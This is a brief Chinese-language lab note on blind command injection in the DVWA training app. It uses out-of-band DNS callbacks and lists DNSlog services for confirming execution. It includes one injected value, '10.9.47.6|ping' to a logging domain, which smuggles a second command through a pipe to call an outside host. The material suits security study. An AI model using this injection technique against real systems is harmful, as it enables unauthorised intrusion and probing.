实验环境
- DVWA命令执行漏洞关卡
OOB注入
OOB技术
- 带外通道技术(Out of Band,00B)让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞。这一类漏洞攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。
- 带外通道技术通常需要脆弱的实体来生成带外的 TCP、UDP、ICMP 请求,然后,攻击者可以通过这个请求来提取数据。
关键点
- 应用于无回显情况
- DNS带外—要求目标能上外网
DNS平台(DNSlog)
- DNS带外需要DNS平台进行记录
- http://dnslog.cn/
- http://ceye.io/
- https://dig.pm/
- Yakit自带DNSlog
以Yakit自带DNSlog为例子
- 生成一个可用域名
- 已知DVWA命令执行关卡low等级无任何过滤,我假设它无回显的情况之下,使用拼接符ping我生成的域名,有记录则执行成功
10.9.47.6|ping ilyxategrp.dgrh3.cn
- 命令执行成功